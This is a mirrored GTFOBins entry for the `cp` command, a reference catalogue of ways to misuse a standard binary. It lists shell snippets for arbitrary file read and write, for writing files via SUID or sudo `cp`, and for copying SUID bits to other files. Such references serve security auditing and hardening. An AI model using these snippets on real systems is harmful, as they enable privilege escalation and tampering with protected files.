mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
36 lines
1.4 KiB
Markdown
36 lines
1.4 KiB
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
cp "$LFILE" /dev/stdout
|
|
file-write:
|
|
- code: |
|
|
LFILE=file_to_write
|
|
echo "DATA" | cp /dev/stdin "$LFILE"
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_write
|
|
echo "DATA" | ./cp /dev/stdin "$LFILE"
|
|
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)
|
|
code: |
|
|
LFILE=file_to_write
|
|
TF=$(mktemp)
|
|
echo "DATA" > $TF
|
|
./cp $TF $LFILE
|
|
- description: This can copy SUID permissions from any SUID binary (e.g., `cp` itself) to another.
|
|
code: |
|
|
LFILE=file_to_change
|
|
./cp --attributes-only --preserve=all ./cp "$LFILE"
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_write
|
|
echo "DATA" | sudo cp /dev/stdin "$LFILE"
|
|
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)
|
|
code: |
|
|
LFILE=file_to_write
|
|
TF=$(mktemp)
|
|
echo "DATA" > $TF
|
|
sudo cp $TF $LFILE
|
|
---
|